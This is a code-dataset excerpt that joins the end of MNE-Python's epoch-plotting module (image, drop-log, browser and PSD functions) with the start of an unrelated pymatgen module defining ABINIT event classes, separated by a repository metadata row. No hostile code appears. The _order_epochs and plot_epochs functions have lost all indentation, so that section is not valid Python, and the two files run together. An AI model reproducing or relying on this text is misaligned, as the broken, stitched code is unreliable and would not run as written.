        this_image = combine_func(this_data * scalings[this_ch_type])
        # handle `order`. NB: this can potentially yield different orderings
        # in each figure!
        this_image, _overlay_times = _order_epochs(this_image, epochs.times,
                                                   order, overlay_times)
        this_norm = np.all(this_image > 0)
        # apply smoothing
        if sigma > 0.:
            this_image = gaussian_filter1d(this_image, sigma=sigma, axis=0,
                                           mode='nearest')
        # update the group_by and vmin_vmax dicts.
        # BUGFIX: the (possibly reordered) overlay times are stored per
        # group, so each figure gets the overlay matching its own epoch
        # ordering; previously `_overlay_times` leaked out of this loop and
        # the last group's ordering was applied to every figure.
        group_by[this_group].update(image=this_image, epochs=this_epochs,
                                    norm=this_norm,
                                    overlay_times=_overlay_times)
        vmin_vmax[this_ch_type]['images'].append(this_image)
        vmin_vmax[this_ch_type]['norm'].append(this_norm)
    # compute overall vmin/vmax for images
    for ch_type, this_vmin_vmax_dict in vmin_vmax.items():
        image_list = this_vmin_vmax_dict['images']
        image_stack = np.stack(image_list)
        norm = all(this_vmin_vmax_dict['norm'])
        vmin_vmax[ch_type] = _setup_vmin_vmax(image_stack, vmin, vmax, norm)
    del image_stack, vmin, vmax
    # prepare to plot
    auto_ylims = {ch_type: [0., 0.] for ch_type in set(ch_types)}
    # plot
    for this_group, this_group_dict in group_by.items():
        this_ch_type = this_group_dict['ch_type']
        this_axes_dict = this_group_dict['axes']
        vmin, vmax = vmin_vmax[this_ch_type]
        # plot title
        if this_group_dict['title'] is None:
            title = _handle_default('titles').get(this_group, this_group)
            if isinstance(combine, str) and len(title):
                _comb = combine.upper() if combine == 'gfp' else combine
                _comb = 'std. dev.' if _comb == 'std' else _comb
                title += f' ({_comb})'
        # plot the image
        this_fig = _plot_epochs_image(
            this_group_dict['image'], epochs=this_group_dict['epochs'],
            picks=picks, colorbar=colorbar, vmin=vmin, vmax=vmax, cmap=cmap,
            style_axes=True, norm=this_group_dict['norm'],
            unit=units[this_ch_type], ax=this_axes_dict, show=False,
            title=title, combine=combine, combine_given=combine_given,
            overlay_times=this_group_dict['overlay_times'], evoked=evoked,
            ts_args=ts_args)
        group_by[this_group].update(fig=this_fig)
        # detect ylims across figures
        if evoked and not manual_ylims:
            # ensure get_ylim works properly
            this_axes_dict['evoked'].figure.canvas.draw_idle()
            this_bot, this_top = this_axes_dict['evoked'].get_ylim()
            this_min = min(this_bot, this_top)
            this_max = max(this_bot, this_top)
            # BUGFIX: index with this_ch_type (current group's type); the
            # previous code read ``auto_ylims[ch_type]`` using the stale
            # loop variable from the vmin/vmax loop above, so ylims were
            # accumulated against the wrong channel type.
            curr_min, curr_max = auto_ylims[this_ch_type]
            auto_ylims[this_ch_type] = [min(curr_min, this_min),
                                        max(curr_max, this_max)]
    # equalize ylims across figures (does not adjust ticks)
    if evoked:
        for this_group_dict in group_by.values():
            ax = this_group_dict['axes']['evoked']
            ch_type = this_group_dict['ch_type']
            if not manual_ylims:
                args = auto_ylims[ch_type]
                if 'invert_y' in ts_args:
                    args = args[::-1]
                ax.set_ylim(*args)
    plt_show(show)
    # impose deterministic order of returned objects
    return_order = np.array(sorted(group_by))
    are_ch_types = np.in1d(return_order, _VALID_CHANNEL_TYPES)
    if any(are_ch_types):
        return_order = np.concatenate((return_order[are_ch_types],
                                       return_order[~are_ch_types]))
    return [group_by[group]['fig'] for group in return_order]
def _validate_fig_and_axes(fig, axes, group_by, evoked, colorbar, clear=False):
    """Check user-provided fig/axes compatibility with plot_epochs_image.

    Normalizes the several accepted forms of ``fig``/``axes`` (both None, a
    Figure, a single Axes, an ndarray of Axes, a list of Axes, or a dict of
    lists of Axes) step by step into one canonical layout: each entry of
    ``group_by`` gains ``'fig'`` (the Figure to draw into) and ``'axes'``
    (a dict mapping the applicable names 'image'/'evoked'/'colorbar' to
    Axes). Returns the mutated ``group_by`` dict; raises ValueError on any
    incompatible combination.
    """
    from matplotlib.pyplot import figure, Axes, subplot2grid
    # number of axes each figure must provide, and their canonical names
    # (only the names enabled by `evoked`/`colorbar` are kept)
    n_axes = 1 + int(evoked) + int(colorbar)
    ax_names = ('image', 'evoked', 'colorbar')
    ax_names = np.array(ax_names)[np.where([True, evoked, colorbar])]
    prefix = 'Since evoked={} and colorbar={}, '.format(evoked, colorbar)
    # got both fig and axes
    if fig is not None and axes is not None:
        raise ValueError('At least one of "fig" or "axes" must be None; got '
                         'fig={}, axes={}.'.format(fig, axes))
    # got fig=None and axes=None: make fig(s) and axes
    if fig is None and axes is None:
        axes = dict()
        colspan = 9 if colorbar else 10
        rowspan = 2 if evoked else 3
        shape = (3, 10)
        for this_group in group_by:
            this_fig = figure()
            _set_window_title(this_fig, this_group)
            # image axes (leaves the last grid column for the colorbar)
            subplot2grid(shape, (0, 0), colspan=colspan, rowspan=rowspan,
                         fig=this_fig)
            if evoked:
                # evoked axes on the bottom row
                subplot2grid(shape, (2, 0), colspan=colspan, rowspan=1,
                             fig=this_fig)
            if colorbar:
                # colorbar axes in the rightmost column
                subplot2grid(shape, (0, 9), colspan=1, rowspan=rowspan,
                             fig=this_fig)
            axes[this_group] = this_fig.axes
    # got a Figure instance
    if fig is not None:
        # If we're re-plotting into a fig made by a previous call to
        # `plot_image`, be forgiving of presence/absence of sensor inset axis.
        if len(fig.axes) not in (n_axes, n_axes + 1):
            raise ValueError('{}"fig" must contain {} axes, got {}.'
                             ''.format(prefix, n_axes, len(fig.axes)))
        if len(list(group_by)) != 1:
            raise ValueError('When "fig" is not None, "group_by" can only '
                             'have one group (got {}: {}).'
                             .format(len(group_by), ', '.join(group_by)))
        key = list(group_by)[0]
        if clear:  # necessary if re-plotting into previous figure
            _ = [ax.clear() for ax in fig.axes]
            if len(fig.axes) > n_axes:  # get rid of sensor inset
                fig.axes[-1].remove()
        _set_window_title(fig, key)
        axes = {key: fig.axes}
    # got an Axes instance, be forgiving (if evoked and colorbar are False)
    if isinstance(axes, Axes):
        axes = [axes]
    # got an ndarray; be forgiving
    if isinstance(axes, np.ndarray):
        axes = axes.ravel().tolist()
    # got a list of axes, make it a dict
    if isinstance(axes, list):
        if len(axes) != n_axes:
            raise ValueError('{}"axes" must be length {}, got {}.'
                             ''.format(prefix, n_axes, len(axes)))
        # for list of axes to work, must be only one group
        if len(list(group_by)) != 1:
            raise ValueError('When axes is a list, can only plot one group '
                             '(got {} groups: {}).'
                             .format(len(group_by), ', '.join(group_by)))
        key = list(group_by)[0]
        axes = {key: axes}
    # got a dict of lists of axes, make it dict of dicts
    if isinstance(axes, dict):
        # in theory a user could pass a dict of axes but *NOT* pass a group_by
        # dict, but that is forbidden in the docstring so it shouldn't happen.
        # The next test could fail in that case because we've constructed a
        # group_by dict and the user won't have known what keys we chose.
        if set(axes) != set(group_by):
            raise ValueError('If "axes" is a dict its keys ({}) must match '
                             'the keys in "group_by" ({}).'
                             .format(list(axes), list(group_by)))
        for this_group, this_axes_list in axes.items():
            if len(this_axes_list) != n_axes:
                raise ValueError('{}each value in "axes" must be a list of {} '
                                 'axes, got {}.'.format(prefix, n_axes,
                                                        len(this_axes_list)))
            # NB: next line assumes all axes in each list are in same figure
            group_by[this_group]['fig'] = this_axes_list[0].get_figure()
            group_by[this_group]['axes'] = {key: axis for key, axis in
                                            zip(ax_names, this_axes_list)}
    return group_by
def _order_epochs(data, times, order=None, overlay_times=None):
"""Sort epochs image data (2D). Helper for plot_epochs_image."""
n_epochs = len(data)
if overlay_times is not None:
if len(overlay_times) != n_epochs:
raise ValueError(
f'size of overlay_times parameter ({len(overlay_times)}) does '
f'not match the number of epochs ({n_epochs}).')
overlay_times = np.array(overlay_times)
times_min = np.min(overlay_times)
times_max = np.max(overlay_times)
if (times_min < times[0]) or (times_max > times[-1]):
warn('Some values in overlay_times fall outside of the epochs '
f'time interval (between {times[0]} s and {times[-1]} s)')
if callable(order):
order = order(times, data)
if order is not None:
if len(order) != n_epochs:
raise ValueError(f'If order is a {type(order).__name__}, its '
f'length ({len(order)}) must match the length of '
f'the data ({n_epochs}).')
order = np.array(order)
data = data[order]
if overlay_times is not None:
overlay_times = overlay_times[order]
return data, overlay_times
def _plot_epochs_image(image, style_axes=True, epochs=None, picks=None,
                       vmin=None, vmax=None, colorbar=False, show=False,
                       unit=None, cmap=None, ax=None, overlay_times=None,
                       title=None, evoked=False, ts_args=None, combine=None,
                       combine_given=False, norm=False):
    """Plot epochs image. Helper function for plot_epochs_image.

    ``image`` is a 2D array (epochs x times); ``ax`` is a dict with key
    'image' and, as applicable, 'evoked' and 'colorbar' mapping to Axes.
    Returns the Figure containing ``ax['image']``.
    """
    from matplotlib.ticker import AutoLocator
    # default colormap: sequential for all-positive data, diverging otherwise
    if cmap is None:
        cmap = 'Reds' if norm else 'RdBu_r'
    tmin = epochs.times[0]
    tmax = epochs.times[-1]
    ax_im = ax['image']
    fig = ax_im.get_figure()
    # draw the image (cmap becomes a (colormap, interactive_bool) tuple here)
    cmap = _setup_cmap(cmap, norm=norm)
    n_epochs = len(image)
    extent = [tmin, tmax, 0, n_epochs]
    im = ax_im.imshow(image, vmin=vmin, vmax=vmax, cmap=cmap[0], aspect='auto',
                      origin='lower', interpolation='nearest', extent=extent)
    # optional things
    if style_axes:
        ax_im.set_title(title)
        ax_im.set_ylabel('Epochs')
        if not evoked:
            # only label time on the image when no evoked panel sits below it
            ax_im.set_xlabel('Time (s)')
        ax_im.axis('auto')
        ax_im.axis('tight')
        ax_im.axvline(0, color='k', linewidth=1, linestyle='--')
        if overlay_times is not None:
            # one marker per epoch row, drawn at the row's vertical center
            ax_im.plot(overlay_times, 0.5 + np.arange(n_epochs), 'k',
                       linewidth=2)
        ax_im.set_xlim(tmin, tmax)
    # draw the evoked
    if evoked:
        from . import plot_compare_evokeds
        # only forward `combine` when the caller explicitly provided one
        pass_combine = (combine if combine_given else None)
        _picks = [0] if len(picks) == 1 else None  # prevent applying GFP
        plot_compare_evokeds({'cond': list(epochs.iter_evoked(copy=False))},
                             picks=_picks, axes=ax['evoked'],
                             combine=pass_combine, **ts_args)
        ax['evoked'].set_xlim(tmin, tmax)
        ax['evoked'].lines[0].set_clip_on(True)
        ax['evoked'].collections[0].set_clip_on(True)
        # share the time axis between image and evoked panels
        ax['evoked'].get_shared_x_axes().join(ax['evoked'], ax_im)
        # fix the axes for proper updating during interactivity
        loc = ax_im.xaxis.get_major_locator()
        ax['evoked'].xaxis.set_major_locator(loc)
        ax['evoked'].yaxis.set_major_locator(AutoLocator())
    # draw the colorbar
    if colorbar:
        from matplotlib.pyplot import colorbar as cbar
        this_colorbar = cbar(im, cax=ax['colorbar'])
        this_colorbar.ax.set_ylabel(unit, rotation=270, labelpad=12)
        if cmap[1]:
            # interactive mode: keep a reference on the axes so the
            # draggable colorbar isn't garbage-collected
            ax_im.CB = DraggableColorbar(this_colorbar, im)
        with warnings.catch_warnings(record=True):
            warnings.simplefilter('ignore')
            tight_layout(fig=fig)
    # finish
    plt_show(show)
    return fig
def plot_drop_log(drop_log, threshold=0, n_max_plot=20, subject='Unknown subj',
                  color='lightgray', width=0.8, ignore=('IGNORED',),
                  show=True):
    """Show the channel stats based on a drop_log from Epochs.

    Parameters
    ----------
    drop_log : list of list
        Epoch drop log from Epochs.drop_log.
    threshold : float
        The percentage threshold to use to decide whether or not to
        plot. Default is zero (always plot).
    n_max_plot : int
        Maximum number of channels to show stats for.
    subject : str | None
        The subject name to use in the title of the plot. If ``None``, do not
        display a subject name.

        .. versionchanged:: 0.23
           Added support for ``None``.
    color : tuple | str
        Color to use for the bars.
    width : float
        Width of the bars.
    ignore : list
        The drop reasons to ignore.
    show : bool
        Show figure if True.

    Returns
    -------
    fig : instance of matplotlib.figure.Figure
        The figure.
    """
    import matplotlib.pyplot as plt
    from ..epochs import _drop_log_stats
    percent = _drop_log_stats(drop_log, ignore)
    if percent < threshold:
        logger.info('Percent dropped epochs < supplied threshold; not '
                    'plotting drop log.')
        return
    # tally how often each channel was responsible for a drop
    reasons = Counter(ch for entry in drop_log for ch in entry
                      if ch not in ignore)
    ch_names = np.array(list(reasons))
    counts = np.array(list(reasons.values()))
    # init figure, handle easy case (no drops)
    fig, ax = plt.subplots()
    caption = f'{percent:.1f}% of all epochs rejected'
    if subject is not None:
        caption = f'{subject}: {caption}'
    ax.set_title(caption)
    if len(ch_names) == 0:
        ax.text(0.5, 0.5, 'No drops', ha='center', fontsize=14)
        return fig
    # count epochs that aren't fully caught by `ignore`
    n_used = 0
    for entry in drop_log:
        if len(entry) == 0 or any(ch not in ignore for ch in entry):
            n_used += 1
    # calc plot values
    n_bars = min(n_max_plot, len(ch_names))
    positions = np.arange(n_bars)
    drop_pct = 100 * counts / n_used
    sort_idx = np.flipud(np.argsort(drop_pct))
    ax.bar(positions, drop_pct[sort_idx[:n_bars]], color=color, width=width,
           align='center')
    ax.set_xticks(positions)
    ax.set_xticklabels(ch_names[sort_idx[:n_bars]], rotation=45, size=10,
                       horizontalalignment='right')
    ax.set_ylabel('% of epochs rejected')
    ax.grid(axis='y')
    tight_layout(pad=1, fig=fig)
    plt_show(show)
    return fig
@fill_doc
def plot_epochs(epochs, picks=None, scalings=None, n_epochs=20, n_channels=20,
title=None, events=None, event_color=None,
order=None, show=True, block=False, decim='auto',
noise_cov=None, butterfly=False, show_scrollbars=True,
show_scalebars=True, epoch_colors=None, event_id=None,
group_by='type'):
"""Visualize epochs.
Bad epochs can be marked with a left click on top of the epoch. Bad
channels can be selected by clicking the channel name on the left side of
the main axes. Calling this function drops all the selected bad epochs as
well as bad epochs marked beforehand with rejection parameters.
Parameters
----------
epochs : instance of Epochs
The epochs object.
%(picks_good_data)s
scalings : dict | 'auto' | None
Scaling factors for the traces. If any fields in scalings are 'auto',
the scaling factor is set to match the 99.5th percentile of a subset of
the corresponding data. If scalings == 'auto', all scalings fields are
set to 'auto'. If any fields are 'auto' and data is not preloaded,
a subset of epochs up to 100 Mb will be loaded. If None, defaults to::
dict(mag=1e-12, grad=4e-11, eeg=20e-6, eog=150e-6, ecg=5e-4,
emg=1e-3, ref_meg=1e-12, misc=1e-3, stim=1, resp=1, chpi=1e-4,
whitened=10.)
n_epochs : int
The number of epochs per view. Defaults to 20.
n_channels : int
The number of channels per view. Defaults to 20.
title : str | None
The title of the window. If None, epochs name will be displayed.
Defaults to None.
events : None | array, shape (n_events, 3)
Events to show with vertical bars. You can use `~mne.viz.plot_events`
as a legend for the colors. By default, the coloring scheme is the
same. Defaults to ``None``.
.. warning:: If the epochs have been resampled, the events no longer
align with the data.
.. versionadded:: 0.14.0
%(event_color)s
Defaults to ``None``.
order : array of str | None
Order in which to plot channel types.
.. versionadded:: 0.18.0
show : bool
Show figure if True. Defaults to True.
block : bool
Whether to halt program execution until the figure is closed.
Useful for rejecting bad trials on the fly by clicking on an epoch.
Defaults to False.
decim : int | 'auto'
Amount to decimate the data during display for speed purposes.
You should only decimate if the data are sufficiently low-passed,
otherwise aliasing can occur. The 'auto' mode (default) uses
the decimation that results in a sampling rate at least three times
larger than ``info['lowpass']`` (e.g., a 40 Hz lowpass will result in
at least a 120 Hz displayed sample rate).
.. versionadded:: 0.15.0
noise_cov : instance of Covariance | str | None
Noise covariance used to whiten the data while plotting.
Whitened data channels are scaled by ``scalings['whitened']``,
and their channel names are shown in italic.
Can be a string to load a covariance from disk.
See also :meth:`mne.Evoked.plot_white` for additional inspection
of noise covariance properties when whitening evoked data.
For data processed with SSS, the effective dependence between
magnetometers and gradiometers may introduce differences in scaling,
consider using :meth:`mne.Evoked.plot_white`.
.. versionadded:: 0.16.0
butterfly : bool
Whether to directly call the butterfly view.
.. versionadded:: 0.18.0
%(show_scrollbars)s
%(show_scalebars)s
.. versionadded:: 0.24.0
epoch_colors : list of (n_epochs) list (of n_channels) | None
Colors to use for individual epochs. If None, use default colors.
event_id : dict | None
Dictionary of event labels (e.g. 'aud_l') as keys and associated event
integers as values. Useful when ``events`` contains event numbers not
present in ``epochs.event_id`` (e.g., because of event subselection).
Values in ``event_id`` will take precedence over those in
``epochs.event_id`` when there are overlapping keys.
.. versionadded:: 0.20
%(browse_group_by)s
Returns
-------
fig : instance of matplotlib.figure.Figure
The figure.
Notes
-----
The arrow keys (up/down/left/right) can be used to navigate between
channels and epochs and the scaling can be adjusted with - and + (or =)
keys, but this depends on the backend matplotlib is configured to use
(e.g., mpl.use(``TkAgg``) should work). Full screen mode can be toggled
with f11 key. The amount of epochs and channels per view can be adjusted
with home/end and page down/page up keys. These can also be set through
options dialog by pressing ``o`` key. ``h`` key plots a histogram of
peak-to-peak values along with the used rejection thresholds. Butterfly
plot can be toggled with ``b`` key. Right mouse click adds a vertical line
to the plot. Click 'help' button at bottom left corner of the plotter to
view all the options.
.. versionadded:: 0.10.0
"""
from ._figure import _get_browser
epochs.drop_bad()
info = epochs.info.copy()
sfreq = info['sfreq']
projs = info['projs']
projs_on = np.full_like(projs, epochs.proj, dtype=bool)
if not epochs.proj:
with info._unlock():
info['projs'] = list()
# handle defaults / check arg validity
color = _handle_default('color', None)
scalings = _compute_scalings(scalings, epochs)
scalings = _handle_default('scalings_plot_raw', scalings)
if scalings['whitened'] == 'auto':
scalings['whitened'] = 1.
units = _handle_default('units', None)
unit_scalings = _handle_default('scalings', None)
decim, picks_data = _handle_decim(epochs.info.copy(), decim, None)
noise_cov = _check_cov(noise_cov, epochs.info)
event_id_rev = {v: k for k, v in (event_id or {}).items()}
_check_option('group_by', group_by,
('selection', 'position', 'original', 'type'))
# validate epoch_colors
_validate_type(epoch_colors, (list, None), 'epoch_colors')
if epoch_colors is not None:
if len(epoch_colors) != len(epochs.events):
msg = ('epoch_colors must have length equal to the number of '
f'epochs ({len(epochs)}); got length {len(epoch_colors)}.')
raise ValueError(msg)
for ix, this_colors in enumerate(epoch_colors):
_validate_type(this_colors, list, f'epoch_colors[{ix}]')
if len(this_colors) != len(epochs.ch_names):
msg = (f'epoch colors for epoch {ix} has length '
f'{len(this_colors)}, expected {len(epochs.ch_names)}.')
raise ValueError(msg)
# handle time dimension
n_epochs = min(n_epochs, len(epochs))
n_times = len(epochs) * len(epochs.times)
duration = n_epochs * len(epochs.times) / sfreq
# NB: this includes start and end of data:
boundary_times = np.arange(len(epochs) + 1) * len(epochs.times) / sfreq
# events
if events is not None:
event_nums = events[:, 2]
event_samps = events[:, 0]
epoch_n_samps = len(epochs.times)
# handle overlapping epochs (each event may show up in multiple places)
boundaries = (epochs.events[:, [0]] + np.array([-1, 1])
* epochs.time_as_index(0))
in_bounds = np.logical_and(boundaries[:, [0]] <= event_samps,
event_samps < boundaries[:, [1]])
event_ixs = [np.nonzero(a)[0] for a in in_bounds.T]
warned = False
event_times = list()
event_numbers = list()
for samp, num, _ixs in zip(event_samps, event_nums, event_ixs):
relevant_epoch_events = epochs.events[:, 0][_ixs]
if len(relevant_epoch_events) > 1 and not warned:
logger.info('You seem to have overlapping epochs. Some event '
'lines may be duplicated in the plot.')
warned = True
offsets = samp - relevant_epoch_events + epochs.time_as_index(0)
this_event_times = (_ixs * epoch_n_samps + offsets) / sfreq
event_times.extend(this_event_times)
event_numbers.extend([num] * len(_ixs))
event_nums = np.array(event_numbers)
event_times = np.array(event_times)
else:
event_nums = None
event_times = None
event_color_dict = _make_event_color_dict(event_color, events, event_id)
# determine trace order
picks = _picks_to_idx(info, picks)
n_channels = min(n_channels, len(picks))
ch_names = np.array(epochs.ch_names)
ch_types = np.array(epochs.get_channel_types())
order = _get_channel_plotting_order(order, ch_types, picks)
selections = None
if group_by in ('selection', 'position'):
selections = _setup_channel_selections(epochs, group_by, order)
order = np.concatenate(list(selections.values()))
default_selection = list(selections)[0]
n_channels = len(selections[default_selection])
# generate window title
if title is None:
title = epochs._name
if title is None or len(title) == 0:
title = 'Epochs'
elif not isinstance(title, str):
raise TypeError(f'title must be None or a string, got a {type(title)}')
params = dict(inst=epochs,
info=info,
n_epochs=n_epochs,
# channels and channel order
ch_names=ch_names,
ch_types=ch_types,
ch_order=order,
picks=order[:n_channels],
n_channels=n_channels,
picks_data=picks_data,
group_by=group_by,
ch_selections=selections,
# time
t_start=0,
duration=duration,
n_times=n_times,
first_time=0,
time_format='float',
decim=decim,
boundary_times=boundary_times,
# events
event_id_rev=event_id_rev,
event_color_dict=event_color_dict,
event_nums=event_nums,
event_times=event_times,
# preprocessing
projs=projs,
projs_on=projs_on,
apply_proj=epochs.proj,
remove_dc=True,
filter_coefs=None,
filter_bounds=None,
noise_cov=noise_cov,
use_noise_cov=noise_cov is not None,
# scalings
scalings=scalings,
units=units,
unit_scalings=unit_scalings,
# colors
ch_color_bad='lightgray',
ch_color_dict=color,
epoch_color_bad=(1, 0, 0),
epoch_colors=epoch_colors,
# display
butterfly=butterfly,
clipping=None,
scrollbars_visible=show_scrollbars,
scalebars_visible=show_scalebars,
window_title=title,
xlabel='Epoch number')
fig = _get_browser(**params)
fig._update_picks()
# make channel selection dialog, if requested (doesn't work well in init)
if group_by in ('selection', 'position'):
fig._create_selection_fig()
fig._update_projector()
fig._update_trace_offsets()
fig._update_data()
fig._draw_traces()
plt_show(show, block=block)
return fig
@verbose
def plot_epochs_psd(epochs, fmin=0, fmax=np.inf, tmin=None, tmax=None,
                    proj=False, bandwidth=None, adaptive=False, low_bias=True,
                    normalization='length', picks=None, ax=None, color='black',
                    xscale='linear', area_mode='std', area_alpha=0.33,
                    dB=True, estimate='auto', show=True, n_jobs=1,
                    average=False, line_alpha=None, spatial_colors=True,
                    sphere=None, exclude='bads', verbose=None):
    """%(plot_psd_doc)s.

    Parameters
    ----------
    epochs : instance of Epochs
        The epochs object.
    fmin : float
        Start frequency to consider.
    fmax : float
        End frequency to consider.
    tmin : float | None
        Start time to consider.
    tmax : float | None
        End time to consider.
    proj : bool
        Apply projection.
    bandwidth : float
        The bandwidth of the multi taper windowing function in Hz. The default
        value is a window half-bandwidth of 4.
    adaptive : bool
        Use adaptive weights to combine the tapered spectra into PSD
        (slow, use n_jobs >> 1 to speed up computation).
    low_bias : bool
        Only use tapers with more than 90%% spectral concentration within
        bandwidth.
    %(normalization)s
    %(plot_psd_picks_good_data)s
    ax : instance of Axes | None
        Axes to plot into. If None, axes will be created.
    %(plot_psd_color)s
    %(plot_psd_xscale)s
    %(plot_psd_area_mode)s
    %(plot_psd_area_alpha)s
    %(plot_psd_dB)s
    %(plot_psd_estimate)s
    %(show)s
    %(n_jobs)s
    %(plot_psd_average)s
    %(plot_psd_line_alpha)s
    %(plot_psd_spatial_colors)s
    %(topomap_sphere_auto)s
    exclude : list of str | 'bads'
        Channels names to exclude from being shown. If 'bads', the bad channels
        are excluded. Pass an empty list to plot all channels (including
        channels marked "bad", if any).

        .. versionadded:: 0.24.0
    %(verbose)s

    Returns
    -------
    fig : instance of Figure
        Figure with frequency spectra of the data channels.
    """
    # Local import to avoid a circular import at module load time.
    from ._mpl_figure import _psd_figure
    # generate figure
    # epochs always use multitaper, not Welch, so no need to allow "window"
    # param above
    fig = _psd_figure(
        inst=epochs, proj=proj, picks=picks, axes=ax, tmin=tmin, tmax=tmax,
        fmin=fmin, fmax=fmax, sphere=sphere, xscale=xscale, dB=dB,
        average=average, estimate=estimate, area_mode=area_mode,
        line_alpha=line_alpha, area_alpha=area_alpha, color=color,
        spatial_colors=spatial_colors, n_jobs=n_jobs, bandwidth=bandwidth,
        adaptive=adaptive, low_bias=low_bias, normalization=normalization,
        window='hamming', exclude=exclude)
    # plt_show honors the ``show`` flag (figure is returned either way).
    plt_show(show)
    return fig
| drammock/mne-python | mne/viz/epochs.py | Python | bsd-3-clause | 43,879 | [
"Gaussian"
] | 2b8171f0f1030a7a2a73c9f523163719c3d01fa6e3399792c0fb4f16de929d73 |
# coding: utf-8
"""
This module defines the events signaled by abinit during the execution. It also
provides a parser to extract these events from the main output file and the log file.
"""
from __future__ import unicode_literals, division, print_function

import os.path
import collections

import yaml

from monty.fnmatch import WildCard
from monty.termcolor import colored
from pymatgen.core import Structure
from pymatgen.serializers.json_coders import PMGSONable, pmg_serialize

from .abiinspect import YamlTokenizer

# Public API of this module.
__all__ = [
    "EventsParser",
]
def indent(lines, amount, ch=' '):
    """Return *lines* with every line left-padded by *amount* copies of *ch*."""
    pad = ch * amount
    return '\n'.join(pad + line for line in lines.split('\n'))
def straceback():
    """Return the traceback of the exception being handled, as a string."""
    from traceback import format_exc
    return format_exc()
class AbinitEvent(yaml.YAMLObject): #, PMGSONable):
    """
    Base class for the events reported by ABINIT inside YAML documents.

    Example (YAML syntax)::

        Normal warning without any handler:

        --- !Warning
        message: |
            This is a normal warning that won't
            trigger any handler in the python code!
        src_file: routine_name
        src_line: 112
        ...

        Critical warning that will trigger some action in the python code.

        --- !ScfConvergeWarning
        message: |
            The human-readable message goes here!
        src_file: foo.F90
        src_line: 112
        tolname: tolwfr
        actual_tol: 1.0e-8
        required_tol: 1.0e-10
        nstep: 50
        ...

    The algorithm to extract the YAML sections is very simple.

    1) We use YamlTokenizer to extract the documents from the output file.
    2) If we have a tag that ends with "Warning", "Error", "Bug" or "Comment"
       we know we have encountered a new ABINIT event.
    3) We parse the document with yaml.load(doc.text) and we get the object.

    Note that:

    # --- and ... become reserved words (when they are placed at
      the beginning of a line) since they are used to mark the beginning and
      the end of YAML documents.

    # All the possible events should subclass `AbinitEvent` and define
      the class attribute yaml_tag so that yaml.load will know how to
      build the instance.
    """
    #color = None

    def __init__(self, message, src_file, src_line):
        """
        Basic constructor for :class:`AbinitEvent`.

        Args:
            message: String with human-readable message providing info on the event.
            src_file: String with the name of the Fortran file where the event is raised.
            src_line: Integer giving the line number in src_file.
        """
        self.message = message
        self._src_file = src_file
        self._src_line = src_line

    @pmg_serialize
    def as_dict(self):
        """Return a JSON-serializable dict representation of the event."""
        return dict(message=self.message, src_file=self.src_file, src_line=self.src_line)

    @classmethod
    def from_dict(cls, d):
        """Rebuild the event from the dictionary produced by ``as_dict``."""
        d = d.copy()
        # Drop the serialization bookkeeping keys added by @pmg_serialize
        # before forwarding the remaining items to the constructor.
        d.pop('@module', None)
        d.pop('@class', None)
        return cls(**d)

    @property
    def header(self):
        """One-line summary: event name followed by its source location."""
        return "%s at %s:%s" % (self.name, self.src_file, self.src_line)

    def __str__(self):
        return "\n".join((self.header, self.message))

    @property
    def src_file(self):
        """String with the name of the Fortran file where the event is raised."""
        try:
            return self._src_file
        except AttributeError:
            # Instances built by the YAML loader bypass __init__ and may
            # therefore lack this attribute.
            return "Unknown"

    @property
    def src_line(self):
        """Integer giving the line number in src_file."""
        try:
            return self._src_line
        except AttributeError:
            # See src_file: the attribute may be missing for YAML-built events.
            return "Unknown"

    @property
    def name(self):
        """Name of the event (class name)"""
        return self.__class__.__name__

    @property
    def baseclass(self):
        """The baseclass of self."""
        # _BASE_CLASSES is ordered: the first isinstance match wins.
        for cls in _BASE_CLASSES:
            if isinstance(self, cls):
                return cls

        raise ValueError("Cannot determine the base class of %s" % self.__class__.__name__)

    def log_correction(self, task, message):
        """
        This method should be called once we have fixed the problem associated to this event.
        It adds a new entry in the correction history of the task.

        Args:
            task: The :class:`Task` whose correction history is updated.
            message (str): Human-readable string with info on the action performed to solve the problem.
        """
        task._corrections.append(dict(
            event=self.as_dict(),
            message=message,
        ))

    def correct(self, task):
        """
        This method is called when an error is detected in a :class:`Task`
        It should perform any corrective measures relating to the detected error.
        The idea is similar to the one used in custodian but the handler receives
        a :class:`Task` object so that we have access to its methods.

        Returns:
        (dict) JSON serializable dict that describes the errors and actions taken. E.g.
        {"errors": list_of_errors, "actions": list_of_actions_taken}.
        If this is an unfixable error, actions should be set to None.
        """
        # NOTE(review): the base implementation returns 0 (no correction
        # applied), not the dict described above -- confirm what callers expect.
        return 0
class AbinitComment(AbinitEvent):
    """Base class for Comment events"""
    yaml_tag = '!COMMENT'
    # color is the monty.termcolor name used when the event is printed.
    color = "blue"


class AbinitError(AbinitEvent):
    """Base class for Error events"""
    yaml_tag = '!ERROR'
    color = "red"


class AbinitYamlError(AbinitError):
    """Raised if the YAML parser cannot parse the document and the doc tag is an Error."""


class AbinitBug(AbinitEvent):
    """Base class for Bug events"""
    yaml_tag = '!BUG'
    color = "red"


class AbinitWarning(AbinitEvent):
    """
    Base class for Warning events (the most important class).
    Developers should subclass this class to define the different exceptions
    raised by the code and the possible actions that can be performed.
    """
    yaml_tag = '!WARNING'
    color = None


class AbinitCriticalWarning(AbinitWarning):
    """Warning shown in red: subclasses mark conditions that require action."""
    color = "red"


class AbinitYamlWarning(AbinitCriticalWarning):
    """
    Raised if the YAML parser cannot parse the document and the doc tag is a Warning.
    """
# Warnings that trigger restart.
# Each yaml_tag must match the tag emitted by ABINIT so that yaml.load
# resolves the document to the right class (see AbinitEvent docstring).
class ScfConvergenceWarning(AbinitCriticalWarning):
    """Warning raised when the GS SCF cycle did not converge."""
    yaml_tag = '!ScfConvergenceWarning'


class NscfConvergenceWarning(AbinitCriticalWarning):
    """Warning raised when the GS NSCF cycle did not converge."""
    yaml_tag = '!NscfConvergenceWarning'


class RelaxConvergenceWarning(AbinitCriticalWarning):
    """Warning raised when the structural relaxation did not converge."""
    yaml_tag = '!RelaxConvergenceWarning'


# TODO: for the time being we don't discern between GS and PhononCalculations.
#class PhononConvergenceWarning(AbinitCriticalWarning):
#    """Warning raised when the phonon calculation did not converge."""
#    yaml_tag = u'!PhononConvergenceWarning'


class QPSConvergenceWarning(AbinitCriticalWarning):
    """Warning raised when the QPS iteration (GW) did not converge."""
    yaml_tag = '!QPSConvergenceWarning'


class HaydockConvergenceWarning(AbinitCriticalWarning):
    """Warning raised when the Haydock method (BSE) did not converge."""
    yaml_tag = '!HaydockConvergenceWarning'
# Error classes providing a correct method.
class DilatmxError(AbinitError):
    """
    Error reported by ABINIT during a structural relaxation; handled by
    restarting from the last structure dumped before the code aborted.
    """
    yaml_tag = '!DilatmxError'

